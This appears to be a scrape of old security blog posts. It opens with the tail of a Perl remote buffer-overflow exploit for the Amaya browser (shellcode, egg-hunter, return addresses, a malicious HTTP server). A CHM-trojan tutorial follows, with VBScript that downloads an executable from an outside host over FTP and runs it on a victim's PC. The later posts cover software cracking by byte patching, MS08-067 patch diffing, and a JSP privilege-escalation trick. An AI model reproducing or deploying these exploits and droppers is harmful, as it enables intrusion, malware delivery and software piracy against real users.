"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
 
# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6).     #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
("\x47\x47\x47\x47\x57\xFF\x65\x78\x77\x76");
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10";  #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10";    #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40;      # 45446537    look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4;      # 45446537                <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4;      # 45446537            <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4;      # 45446537        <-
my $additionaddr = "\x35\x65\x41\x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)\n";
 
while(1)
{
my $sock=new IO::Socket::INET(Listen=>1,LocalAddr => $listenip,LocalPort=>$port_listen,Proto=>'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
while($s=$sock->accept()){
print "[x] Got a client!\n";
my $request = <$s>;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
print $s "\n".
"\n".
"\n".
"
\n".
"
 
\n".
"\n".
"\r\n";
sleep(0.5);
close $s;
print "[x] Done!\n";
}
}

Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex”  or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To  User & Block Script .

when we are during running  a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If  our Script  inclusive  ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to  USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT  [With IDE] :

http://www.vbsedit.com/

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :
<html>
<object id=”wsh”
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
<script>
wsh.Run(“c:\windows\system32\calc.exe”);
</script>
</html>

Or  :

<HTML>
<SCRIPT>
function PROCJavascriptRunProgramParameter( programNameS,
parameterS )
{
var shell = new ActiveXObject(“WScript.Shell”);
var quoteS = String.fromCharCode( 34 );
shell.run( quoteS + programNameS + quoteS + ” ” + parameterS, 1,
false );
self.close();
}
</SCRIPT>
<BODY ONLOAD=’PROCJavascriptRunProgramParameter( “C:/windows/system32/calc.exe”, “names.nsf” );’>
</BODY>

Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT  I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

<script language=vbscript>
Dim Http
Set Http = CreateObject(“WinHttp.WinHttpRequest.5.1″)
URL = “http://abysssec.com”
‘Send request To URL
Http.Open “GET”, URL, False
Http.Send
‘Get response data As a string
BinaryGetURL = Http.ResponseBody
</script>

SAVE FILE  [ Achilles heel  IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

<script language=vbscript>
set  shell = CreateObject(“WScript.Shell”)
shell.run( “cmd.exe” )
</script>

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through  “Heap Spray” Method  .

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method  .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]

Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

Hello viewers
For long time I was looking for some codes for monitoring APACHE’s log
to detection some attacks and /or some     errors that can help server administrators to have a security solution for web servers.

So is so simple to find but its so dirty :d.
In  first stage script checks number of signatures of some of public attacks , you can change or/and edit them. After calculating errors script shows to you alarm or attention or …. messages and  here you decide  to what to want…
And at last total summary of logs with details was saved on path….
I want to write a better code as soon as possible ;)

here is quick log check’s snapshot

and check details

Last code was so slow !! and heavy .Here is fastest than beta-1 code .
I was check a log file ~ 150MB and getting results in 5 min.
It has been fastest as soon as possible ;) thanks.

Download Source code (beta 2 – cleaned code ! optimized – ):

download : log parser

hello to all our readers

In the past time of cracking many of the programs include the serial routine in the main EXE and u with the name of the cracker, able to find the routine and the valid serial in the main PE

But some of the big and pros team include the serial routine in the dll beside the main exe
And u with the name of cracker can fish and find the serial’s in the dlls of the products

In this new generation of software development this point change to the habit and many product use the dlls to check the serial ( online check or etc .., )  or make the serial ( serial Function … )

The nice friend from SND makes the little serial ME to guide the crackers how to fishing the serial from dlls and here the MrXX will teach the noob crackers

Get the serialME

Ok execute the exe and enter this information
NAME: MrXX
Serial: 123
“Invalid information, Please try again” what the ————– :(

Ok fire up the olly and load the target, run the target [F9] and in the main olly open the View > Executable modules and take look at the executed m
You will see the Prog.dll is in the use ok DClick to load the dll in olly

Oki daki the dll loaded into olly, in the CPU view right click under the Search for > All intermodular Calls
Scroll done, remember when u wrote the wrong serial the PE popup the Message box ok

DClick on the MessageBoxA and u going to the refer of message box
Do nothing

There is nothing interesting, not good??

Make olly minimize and u able to see the serialME, input the wrong name and serial again , the message box popup again click on the ok and back to olly

O some line was append, I think those are interesting :) , u can see the wrong serial 123 and right serial beside each other

right click on the serial in olly under copy > to clipboard and paste the code into serialME

and see the right message

that’s it , u fish the serial

see the source of serialME

and the author write his own keygen

see the source of keygen

u need the RadASM to use the source

lets going to the next step

I really enjoy to make the PE work with my serial

In the world of cracking we call this byte patching

Ok lets patch the EXE

Load the dll again into olly like as I say in up

Going to the message lines

And look carefully you will see 1 old friend into the strange PE

That’s right

JNZ

very easy , change the JNZ to JE and u able to register the PE with any serial that u like

I hope u will enjoy it , wait for more

And excuse us for our limit time

MrXX

hello again to all our patient readers

it’s been a long time since we wrote our last post’s ?! first of all i should say sorry for late in blog updates but the first reason is  we are really busy in these days with accomplish our projects . the second reason was changing our server . and finally the third reason is starting abysssec inc with a professional team for accomplish new projects and services . in soon future we have lots of good news may that’s interest you . so please be patient to see our news on our new index (that come soon as soon possible)

===================================================================

today i wanna talk about Microsoft security patch’s analysis  . as you know this year and specially last month’s of this year was a nightmare for M$ windows because we saw MS08-067 – MS08-068 – MS08-006 and MS08-001 and etc . and as you know too publishing real and working exploits is going to die and just you can see commercial exploits on time .

i saw this picture in one of Mr Nicolas Waisman  presentation and i believe to mind of this picture :

my goal from this introduction is if you want an exploit on publishing time you just have two chose :

1- write your own exploit

2- buy commercial exploit for your requirement vulnerability

- if you are a super millionaire you can buy all commercial exploits from variant security research teams and we are one of them ;)

- and if you are not you and you like and you need an exploit on time you should write your own exploit . and writing exploit for modern operation system’s is not easy because you need bypass a dozen of memory protections (such as DEP / ASLR / SAFSEH / Safe unlinking   and etc …  (from OS to commercial target software) also i believe this Mr Dave Aitel sentence : Not only are bugs expensive but the techniques for reliably exploiting bugs becomes expensive .

anyway becoming a real exploit coder is not easy but it’s possible and i should quote and notice another sentence that is : Modern Exploits – Do You Still Need To Learn Assembly Language (ASM) ( you can read full post here : (http://www.darknet.org.uk/2008/09/modern-exploits-do-you-still-need-to-learn-assembly-language-asm/)

i,m fully sure learning assembly language will help you in all of exploit development levels from reversing and understanding vulnerability to writing reliable exploit code for modern operation system’s .

after you can understand assembly code you can supposition high level code and thereupon you can identify vulnerability from discrepancy between patched and unpatched binaries (however advanced tools and IDA plugin’s make your life easier and you can identify vulnerable code / function if a few minutes)  this technic is called binary diffing. in future i,ll discuss a few advanced trick and methods , that’s improve your speed and analysis but for now i just talk about main of binary diffing on Microsoft security patch’s .

first step is downloading patch from Microsoft . the best way is searching on Microsoft site for your target bulletin . for example see MS08-067 (my favorite bug in this year :D )

just you need click on your target os and download the path.

after you downloaded the patch as you know you should not install the patch and you need extract patch data

with /x command .for example extracting ms08-067 patch :

the output of executing atop command is extract all date inside the patch . and in this example result is :

as you can see in this patch we have just one file and that is a dll named netapi32.dll so we can understand vulnerable function is in this dll .

next step is find vulnerable (unpatched) file (or files) on your system and then you can rename patched file to filename_patched.XXX and then you can analysis and notice changes in patched and unpatched files.

for accomplish this procedure you can use different tools and ways . but using IDA Pro is one of best and logical ways you can use for this procedure . you can understand changes without any plugins and auxiliary tools but for imporving speed and getting better result you have tree choice .

1- using bindiff (exclusive commercial IDA plugin and best auxiliary too analysis

for example you can see patch analysis video for MS08-001 (TCP/IP Kernel Pool Overflow)  here :

http://www.zynamics.com/files/ms08001.swf

2- using Eeye DiffingSuite  i like this tools because it’s really easy to use and effective .

you can download this tools from following link :

http://research.eeye.com/html/Tools/download/DiffingSuiteSetup.exe

and also you see tree good video about analysis different patched with this tools

- analysing MS06-033 : http://research.eeye.com/html/tools/tutorials/BDS_v_MS06-033.htm

- analysing MS06-007 : http://research.eeye.com/html/tools/tutorials/MS06-007.htm

- analysing MS06-036 : http://research.eeye.com/html/tools/tutorials/MS06-036%20Analysis.htm

after videos please read following link (a good work from Mr stephen lawler) about full reverse of MS08-067 patch using DiffingSuite and IDA pro cheerfully because it contain divisor of work :

http://www.dontstuffbeansupyournose.com/?p=35

3- using tenable security PatchDiff . PatchDiff is another IDA Pro Plugin (like bindiff) but have a big difference with Bindiff this plugin is free !

you can see a video about this plugin here :

http://cgi.tenablesecurity.com/tenable/pdiff2.swf.html

and you can download this plugin from following link :

http://cgi.tenablesecurity.com/tenable/dl.php?p=patchdiff2-2.0.5.zip

using this plugin is so easy but i discuss a few about this plugin  . frist of all you need patched and unpatched binaries after this you just first need open unpatched binary IDA and save disassembly in idb file after that you should open patched binary and save disassembly result to another idb file :

since  this you just need open unpatched IDB using plugin to understating discrepancy . after this step as Mr Nicolas Pouvesle (pathdiff plugin author) discussed graph nodes can be synchronized by double clicking on a given node. Graphs use the following colors:

• white: identical nodes
• grey: unmatched nodes
• red: matched nodes
• tan: identical nodes (different crc)

for example you see patchdiff result for MS08-067 patch :

and :

if you be smart you can write a high level simulator code for vulnerable function . for example Mr Alexander Sotirov wrote a simulator of vulnerable function :


#include

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3
// and sub_6EA11D4D on Vista SP1

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash = NULL;
wchar_t ch;

#ifdef VISTA
int len = wcslen(path);
wchar_t* end_of_path = path + len;
#endif

// If the path starts with a server name, skip it

if ((path[0] == L’\\’ || path[0] == L’/') &&
(path[1] == L’\\’ || path[1] == L’/'))
{
p = path+2;

while (*p != L’\\’ && *p != L’/') {
if (*p == L’\0′)
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L’\\’ || path[0] == L’/')
return 0;
}

if (path[0] == L’\0′) // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L’\\’) {
// we have a slash

if (current_slash == p-1) // don’t allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L’.’ && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L’.’ && (p[2] == L’\\’ || p[2] == L’\0′)) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
// ^ ^ ^
// | | &p[2]
// | |
// | current_slash
// |
// previous_slash

ch = p[2];

#ifdef VISTA
if (previous_slash >= end_of_path)
return 0;

wcscpy_s(previous_slash, (end_of_path-previous_slash)/2, p+2);
#else // XP
wcscpy(previous_slash, &p[2]);
#endif

if (ch == L’\0′)
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we’ll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L’\\’ && q != path)
q–;

if (*p == L’\\’)
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L’\\’) {
// we have \.\ or ^.\

#ifdef VISTA
if (current_slash != NULL) {
if (current_slash >= end_of_path)
return 0;
wcscpy_s(current_slash, (end_of_path-current_slash)/2, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
if (p >= end_of_path)
return 0;
wcscpy_s(p, (end_of_path-p)/2, p+2);
goto end_of_loop;
}
#else // XP
if (current_slash != NULL) {
wcscpy(current_slash, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
#endif
}
else if (p[1] != L’\0′) {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L’\0′;
return 1;
}
}

p++;

end_of_loop:
if (*p == L’\0′)
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L”\\c\\..\\..\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”);
}

final steps are identify vulnerable function / understaning function parameters and write a POC code for controlling EIP .

for example Mr stephen lawler wrote a c program for checking MS08-067 vulnerability by taking the offset between sub_7CDDB23D and the load address of NETAPI32.DLL :


#include

#include

int wmain(int argc, wchar_t **argv)

{

HMODULE netapi32 = LoadLibraryW(argv[1]);

void (__stdcall *foo)(PWCHAR);

WCHAR buf[4096];

*(PVOID*)&foo = (PVOID)(((PUCHAR)netapi32) + 0×1b23d);

//__asm { int 3 }

wcscpy(buf, argv[2]);

foo(buf);

wprintf(L”%s\n”, buf);

}

and finnaly he got a crash :

after getting first crash you just need getting eip and write exploit for vulnerability .

finally i should say sorry for disheveled writing . the reason of this is size of this subject in next post i talk directly about patch analysis tricks and i,ll anlysis another interesting Microsoft Patch step by step .

thank you for your time and attention

best regards

shahin.r

In the name of God.

Hello my friend & all readers  ,

Tomcat [jsp]  &  Jrun  [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can  Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems  Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run  web Application In windows [ Attention in user mode & kernel Mode ] :

.

.

Diagram of Run  web Application In Linux [ Attention in user mode & kernel Mode ] :

.

.

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security  are in user mode & you are not face to face with kernel  , But in  linux we have a different Calling Services & user access .

when “JSP” web application Run in Linux [ with tomcat  or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in  windows [TOMCAT or Jrun web server ]   ,  “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test  . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");

here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :

< %@ page import="java.util.*,java.io.*"%>
< %
%>

# milw0rm.com [2008-11-28]